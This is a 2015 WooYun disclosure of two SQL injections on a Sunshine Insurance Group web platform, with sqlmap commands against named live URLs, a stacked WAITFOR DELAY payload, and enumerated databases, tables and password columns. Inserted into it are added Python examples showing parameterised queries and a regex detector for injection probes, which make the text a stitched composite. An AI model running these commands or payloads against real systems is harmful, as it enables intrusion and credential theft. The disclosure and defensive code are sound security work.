Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0135489

Title: Two SQL injections on a 阳光保险集团 (Sunshine Insurance Group) platform

Vendor: 阳光保险集团

Author: 路人甲

Submitted: 2015-08-20 09:55

Fixed: 2015-10-04 10:12

Published: 2015-10-04 10:12

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)


Vulnerability details

Disclosure status:

2015-08-20: Details sent to the vendor; awaiting vendor action
2015-08-20: Vendor confirmed; details visible to the vendor only
2015-08-30: Details opened to core white hats and domain experts
2015-09-09: Details opened to regular white hats
2015-09-19: Details opened to intern white hats
2015-10-04: Details opened to the public

Brief description:

As the title says.

Detailed description:

Two SQL injections in public-facing (pre-login) pages of the 阳光保险集团 cloud platform.
1. Injection point 1:
Login:

c:\Python27\sqlmap>sqlmap.py -u "http://ygjrex.sinosig.com/tabid/161/Default.aspx?returnurl=%2fdefault.aspx" --data="u_al=login&u_n=admin&u_p=admin123&u_r=0&_=0.33639599406160414" -p u_n


The u_n parameter is vulnerable to time-based (delay) injection:

POST parameter 'u_n' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 88 HTTP(s) requests:
---
Parameter: u_n (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: u_al=login&u_n=admin';WAITFOR DELAY '0:0:5'--&u_p=admin123&u_r=0&_=0.33639599406160414
---


2. Injection point 2:
Password recovery:

sqlmap.py -u "http://ygjrex.sinosig.com/tabid/193/Default.aspx" --data="actionType=ecode&email=a@a.com&surl=http://ygjrex.sinosig.com/?TabId=193" -p email


Error-based injection; data can be extracted quickly.
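Both findings come from the same root cause: a request field (u_n at the login page, email at the password-recovery page) spliced into SQL text, which is why a quote followed by `;WAITFOR DELAY ... --` turns one login query into a two-statement batch on SQL Server. The following is an added example, not code from the report or from the platform it describes. It shows the concatenating pattern next to its parameterised replacement and splits the concatenated text the way the server would see it. The `Users` table, its columns, and the `BYPASS_PAYLOAD` are constructed for the demo; the real backend is MSSQL, and an in-memory sqlite3 database stands in so the example runs offline.

```python
import sqlite3

# Added example, not code from the report or from the platform it describes.
# The real backend is Microsoft SQL Server (sqlmap reported "MSSQL stacked
# queries"); an in-memory sqlite3 database stands in so this runs offline.

# The page's own payload for injection point 1 (login field u_n).
STACKED_PAYLOAD = "admin';WAITFOR DELAY '0:0:5'--"
# Constructed payload for the runtime demo: sqlite has no WAITFOR, but the
# quote-and-comment trick the real payload relies on works the same way.
BYPASS_PAYLOAD = "admin'--"


def make_db():
    """Constructed stand-in for the platform's Users table (columns assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (UserID INTEGER PRIMARY KEY, "
        "Username TEXT NOT NULL, Password TEXT NOT NULL)"
    )
    conn.execute("INSERT INTO Users (Username, Password) VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def build_login_sql_vulnerable(u_n, u_p):
    """The anti-pattern behind both findings: request fields spliced into SQL text."""
    return f"SELECT UserID FROM Users WHERE Username = '{u_n}' AND Password = '{u_p}'"


def login_vulnerable(conn, u_n, u_p):
    """Runs the concatenated query; returns UserID on a match, else None."""
    row = conn.execute(build_login_sql_vulnerable(u_n, u_p)).fetchone()
    return row[0] if row else None


def login_safe(conn, u_n, u_p):
    """Parameterised form: input travels as bound values, never as SQL text."""
    row = conn.execute(
        "SELECT UserID FROM Users WHERE Username = ? AND Password = ?", (u_n, u_p)
    ).fetchone()
    return row[0] if row else None


def split_batch(sql):
    """Split SQL text roughly the way a T-SQL batch is parsed: on ';' outside
    string literals, stopping at a '--' line comment. Enough to count the
    statements the server would run; not a full parser."""
    stmts, cur, in_str, i = [], [], False, 0
    while i < len(sql):
        ch = sql[i]
        if in_str:
            cur.append(ch)
            if ch == "'":
                if sql.startswith("'", i + 1):   # doubled quote = escaped quote
                    cur.append("'")
                    i += 1
                else:
                    in_str = False
        elif ch == "'":
            in_str = True
            cur.append(ch)
        elif ch == ";":
            stmts.append("".join(cur).strip())
            cur = []
        elif sql.startswith("--", i):
            break                                # rest of the line never runs
        else:
            cur.append(ch)
        i += 1
    tail = "".join(cur).strip()
    if tail:
        stmts.append(tail)
    return stmts


if __name__ == "__main__":
    conn = make_db()
    # What the server receives for the page's payload: two statements, with the
    # password check commented out. SQL Server executes the whole batch; the
    # sqlite3 driver refuses multi-statement execute(), so it is only printed here.
    for stmt in split_batch(build_login_sql_vulnerable(STACKED_PAYLOAD, "admin123")):
        print("server would run:", stmt)
    print("vulnerable login, no password:", login_vulnerable(conn, BYPASS_PAYLOAD, "wrong"))
    print("parameterised login, same input:", login_safe(conn, BYPASS_PAYLOAD, "wrong"))
    print("parameterised login, real creds:", login_safe(conn, "admin", "correct-horse"))
```

`split_batch` on the page's payload yields `SELECT UserID FROM Users WHERE Username = 'admin'` and `WAITFOR DELAY '0:0:5'`, the five-second sleep sqlmap timed. The same parameterised form applies to the `email` lookup at injection point 2; on ASP.NET that means `SqlParameter` values on a `SqlCommand`, never string concatenation, and the error-based extraction disappears with it because the injected text is no longer parsed as SQL.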

Proof of vulnerability:

A small amount of information obtained via injection point 2:
Databases:

available databases [22]:
[*] fcdb
[*] km15b
[*] km_14
[*] km_15
[*] km_bjh
[*] km_gdym
[*] km_lhsz
[*] master
[*] meisizixun
[*] model
[*] msdb
[*] pfps
[*] pfps_cuspro
[*] pfps_customer
[*] pfps_plan
[*] pfpsata
[*] pfpsproduct
[*] tempdb
[*] water_crm
[*] waterh2_py
[*] ygbx
[*] zhongmeizhihui


Tables:

[221 tables]
+---------------------------------------------+
| Affiliates |
| AnonymousUsers |
| BRCB_APPDeviceInfo |
| BRCB_AccessroyPath |
| BRCB_Answer |
| BRCB_Attach |
| BRCB_Buffet |
| BRCB_CCUserInfo |
| BRCB_Category |
| BRCB_ClassInfo |
| BRCB_Class_User_Record |
| BRCB_Collect |
| BRCB_Comment |
| BRCB_Course |
| BRCB_CourseBox |
| BRCB_CourseQuestionInstance |
| BRCB_CourseRecord |
| BRCB_Department |
| BRCB_Dictionary |
| BRCB_ErrorQuestion |
| BRCB_Integral |
| BRCB_Log |
| BRCB_MobilePush |
| BRCB_MobileSuggest |
| BRCB_MobileVersion |
| BRCB_NewsMessage |
| BRCB_NewsMessageRecord |
| BRCB_Notice |
| BRCB_NoticeInfo |
| BRCB_NoticePush |
| BRCB_OrgPosition |
| BRCB_Organization |
| BRCB_Paper |
| BRCB_PaperInstance |
| BRCB_PaperInstance_Lastest |
| BRCB_PayRecord |
| BRCB_Question |
| BRCB_QuestionInstance |
| BRCB_Questionnaire |
| BRCB_QuestionnaireAnswer |
| BRCB_QuestionnaireQuestion |
| BRCB_QuestionnaireRecord |
| BRCB_R_Admin_User |
| BRCB_R_Attach_CCUserInfo |
| BRCB_R_Class_CourseBox |
| BRCB_R_Class_Paper |
| BRCB_R_Class_User |
| BRCB_R_Course_CourseBox |
| BRCB_R_Course_Question |
| BRCB_R_Course_User |
| BRCB_R_OrgPosition_CourseBox |
| BRCB_R_OrgPosition_Paper |
| BRCB_R_Paper_Question |
| BRCB_R_Paper_User |
| BRCB_R_UserGroup_CourseBox |
| BRCB_R_UserGroup_Paper |
| BRCB_R_User_CourseRating |
| BRCB_R_User_Group |
| BRCB_R_User_Questionnaire |
| BRCB_R_User_Region |
| BRCB_ShieldWords |
| BRCB_SystemAdmin |
| BRCB_SystemSetting |
| BRCB_User |
| BRCB_UserGroup |
| BRCB_UserMap |
| BRCB_VerifyCode |
| Banners |
| C_InfoCategory |
| C_InfoExtFiled |
| C_InfoExtValue |
| C_InfoItemRole |
| C_InfoModuleInfos |
| C_InfoPage |
| C_InfoSpec |
| C_InfoSpecInfo |
| C_InfoVersions |
| C_info |
| C_infoKeyword |
| C_infoLink |
| C_infoRemark |
| Classification |
| Client_View_BRCB_User_CourseBox_Course |
| Client_View_BRCB_User_TestPaper |
| DesktopModules |
| EventLog |
| EventLogConfig |
| EventLogTypes |
| Files |
| FolderPermission |
| Folders |
| HostSettings |
| HtmlText |
| Lists |
| ModuleControls |
| ModuleDefinitions |
| ModulePermission |
| ModuleSettings |
| Modules |
| MyDesktopLayout |
| Permission |
| PortalAlias |
| PortalDesktopModules |
| Portals |
| Profile |
| ProfilePropertyDefinition |
| RoleGroups |
| Roles |
| Schedule |
| ScheduleHistory |
| ScheduleItemSettings |
| SearchCommonWords |
| SearchIndexer |
| SearchItem |
| SearchItemWord |
| SearchItemWordPosition |
| SearchWord |
| SiteLog |
| Skins |
| SysDictionary |
| SystemMessages |
| TabModuleSettings |
| TabModules |
| TabPermission |
| Tabs |
| UManage_FavoriteCategory |
| UManage_MyFavorites |
| UrlLog |
| UrlTracking |
| Urls |
| UserPortals |
| UserProfile |
| UserRoles |
| Users |
| UsersOnline |
| VendorClassification |
| Vendors |
| Version |
| View_BECB_Questiong_ON_Category_PaperCount |
| View_BECB_R_Course_CourseBoxAndBRCB_Course |
| View_BRCB_Category_Statistics |
| View_BRCB_CourseAndBRCB_Category |
| View_BRCB_CourseBoxAndBRCB_Category |
| View_BRCB_CourseBox_Integration |
| View_BRCB_CourseKekan |
| View_BRCB_Department |
| View_BRCB_IntegralMore |
| View_BRCB_Organization |
| View_BRCB_PaperZhengchang |
| View_BRCB_Paper_ON_Category |
| View_BRCB_Paper_User_Assign_Record |
| View_BRCB_Question_ON_Category |
| View_BRCB_Question_ON_Paper |
| View_BRCB_R_Attach_CCUserInfo |
| View_BRCB_R_Course_QuestionAndBRCB_Question |
| View_BRCB_R_Course_UserAndBRCB_User |
| View_BRCB_R_OrgPosition_CourseBox |
| View_BRCB_R_OrgPosition_Paper |
| View_BRCB_R_UserGroup_CourseBox |
| View_BRCB_R_UserGroup_Paper |
| View_BRCB_R_User_Group |
| View_BRCB_StatisticsOrgCategoryCourse |
| View_BRCB_StatisticsOrgCategoryPaper |
| View_BRCB_StatisticsOrgCourse |
| View_BRCB_StatisticsOrgCourseCategoryRecord |
| View_BRCB_StatisticsOrgUserPaper |
| View_BRCB_StatisticsOrgUserRecord |
| View_BRCB_StatisticsUser |
| View_BRCB_Universal |
| View_BRCB_User |
| View_Category_CourseCount |
| View_Category_Indxe_StudyInfo |
| View_Collect_CourseBox |
| View_CourseBox_Distribution_Record |
| View_CourseRecord_LastTime |
| View_CourseSigned |
| View_NewMessage_Comment_Readed |
| View_NoticeInfo |
| View_Notice_And_Paperinstance_Coures |
| View_PaperListByQuestionId |
| View_Paper_R_User |
| View_TestCount |
| View_TopTenCourse |
| View_UserNewInfo |
| View_UserStatistics |
| View_User_R_Paper |
| WorkflowDef |
| aspnet_Applications |
| aspnet_Membership |
| aspnet_Profile |
| aspnet_Roles |
| aspnet_SchemaVersions |
| aspnet_Users |
| aspnet_UsersInRoles |
| provicetemp |
| sysdiagrams |
| tbl_province |
| vw_Client_CourseList |
| vw_Client_PackageList |
| vw_Client_UserPackageList |
| vw_CourseRecord |
| vw_FolderPermissions |
| vw_Lists |
| vw_ModulePermissions |
| vw_Modules |
| vw_Portals |
| vw_TabPermissions |
| vw_Tabs |
| vw_UManageFavorites |
| vw_UManageMyPublishArticles |
| vw_UManagePassedArticles |
| vw_UManageWaitAuditArticles |
| vw_Users |
| vw_aspnet_Applications |
| vw_aspnet_MembershipUsers |
| vw_aspnet_Profiles |
| vw_aspnet_Roles |
| vw_aspnet_Users |
| vw_aspnet_UsersInRoles |
| wfActive |
| wfTrace |
+---------------------------------------------+


Tables with password-related columns (search on column name):

Table: BRCB_UserMap
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| PassWord | nvarchar |
+----------+----------+
Database: ygbx
Table: vw_Users
[1 column]
+----------------+------+
| Column | Type |
+----------------+------+
| UpdatePassword | bit |
+----------------+------+
Database: ygbx
Table: aspnet_Membership
[10 columns]
+----------------------------------------+----------+
| Column | Type |
+----------------------------------------+----------+
| FailedPasswordAnswerAttemptCount | int |
| FailedPasswordAnswerAttemptWindowStart | datetime |
| FailedPasswordAttemptCount | int |
| FailedPasswordAttemptWindowStart | datetime |
| LastPasswordChangedDate | datetime |
| Password | nvarchar |
| PasswordAnswer | nvarchar |
| PasswordFormat | int |
| PasswordQuestion | nvarchar |
| PasswordSalt | nvarchar |
+----------------------------------------+----------+
Database: ygbx
Table: vw_Portals
[1 column]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| ProcessorPassword | nvarchar |
+-------------------+----------+
Database: ygbx
Table: Portals
[1 column]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| ProcessorPassword | nvarchar |
+-------------------+----------+
Database: ygbx
Table: vw_aspnet_MembershipUsers
[8 columns]
+----------------------------------------+----------+
| Column | Type |
+----------------------------------------+----------+
| FailedPasswordAnswerAttemptCount | int |
| FailedPasswordAnswerAttemptWindowStart | datetime |
| FailedPasswordAttemptCount | int |
| FailedPasswordAttemptWindowStart | datetime |
| LastPasswordChangedDate | datetime |
| PasswordAnswer | nvarchar |
| PasswordFormat | int |
| PasswordQuestion | nvarchar |
+----------------------------------------+----------+
Database: ygbx
Table: Users
[1 column]
+----------------+------+
| Column | Type |
+----------------+------+
| UpdatePassword | bit |
+----------------+------+

Fix recommendation:

No data was dumped; fix it yourselves.
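The report leaves remediation to the vendor. Until the queries are parameterised, a defender also wants to know whether the two endpoints (`/tabid/161/Default.aspx` login, `/tabid/193/Default.aspx` password recovery) are being probed. The following is an added example, not part of the report: it scans application-level request records for the two payload families sqlmap used here, a stacked `;WAITFOR DELAY` (time-based, field u_n) and MSSQL error-based extraction (CONVERT/CAST, field email), decoding repeatedly so double-encoded payloads do not slip past. The request records are constructed; only the u_n payload is the page's own, the email payloads are plausible probes written for the demo, and the rule set is a starting point for alerting, not a WAF.

```python
import re
from urllib.parse import unquote_plus

# Added example, not part of the report. Scans request records (path plus
# form fields) for the two payload families sqlmap used against this platform.
# Rules are a starting set for alerting, not a substitute for parameterised SQL.

RULES = [
    ("mssql-stacked-delay", re.compile(r";\s*waitfor\s+delay\s+'", re.I)),
    ("mssql-error-based", re.compile(
        r"\b(?:convert\s*\(\s*(?:int|n?varchar)\b|cast\s*\(.*?\bas\s+(?:int|n?varchar)\b)",
        re.I)),
    ("quote-then-terminator", re.compile(r"'\s*(?:--|;)")),
]

# Constructed requests, not real traffic. Record 1 carries the report's u_n
# payload; records 3 and 4 are constructed probes for the email field, the last
# one double-percent-encoded to show why decoding has to be repeated.
SAMPLE_REQUESTS = [
    {"path": "/tabid/161/Default.aspx",
     "form": {"u_al": "login", "u_n": "admin", "u_p": "admin123", "u_r": "0"}},
    {"path": "/tabid/161/Default.aspx",
     "form": {"u_al": "login", "u_n": "admin';WAITFOR DELAY '0:0:5'--",
              "u_p": "admin123", "u_r": "0"}},
    {"path": "/tabid/193/Default.aspx",
     "form": {"actionType": "ecode", "email": "o'brien@example.com",
              "surl": "http://ygjrex.sinosig.com/?TabId=193"}},
    {"path": "/tabid/193/Default.aspx",
     "form": {"actionType": "ecode",
              "email": "a@a.com' AND 1234=CONVERT(INT,(SELECT @@version))--",
              "surl": "http://ygjrex.sinosig.com/?TabId=193"}},
    {"path": "/tabid/193/Default.aspx",
     "form": {"actionType": "ecode",
              "email": "a%2540a.com%2527%253BWAITFOR%2520DELAY%2520%25270%253A0%253A5%2527--"}},
]


def normalise(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded), then collapse
    whitespace, so encoded and double-encoded payloads hit the same rules."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value)


def scan_request(req):
    """Return [(field, rule_name)] for every field that trips a rule."""
    hits = []
    for field, raw in req["form"].items():
        value = normalise(raw)
        for name, pattern in RULES:
            if pattern.search(value):
                hits.append((field, name))
    return hits


def scan_requests(requests):
    """Map request index -> hits, skipping clean requests."""
    return {i: h for i, r in enumerate(requests) if (h := scan_request(r))}


if __name__ == "__main__":
    for i, hits in scan_requests(SAMPLE_REQUESTS).items():
        print(SAMPLE_REQUESTS[i]["path"], hits)
```

Two caveats for anyone wiring this up. IIS W3C logs do not record POST bodies, so the form fields have to come from application logging, a reverse proxy or WAF, or an ASP.NET request filter; and the legitimate `o'brien@example.com` record shows why a bare apostrophe must not be a rule on its own. A hit on either endpoint is a strong signal because normal users never send `WAITFOR` or `CONVERT(` in a username or e-mail address, but the alert is a stopgap: the finding is closed only by parameterised queries.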

Copyright: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-08-20 10:11

Vendor reply:

Thank you for the submission. This site is not hosted in the company's data centre; it appears to be an application set up independently by a branch office. We are contacting the person responsible.

Latest status:

None yet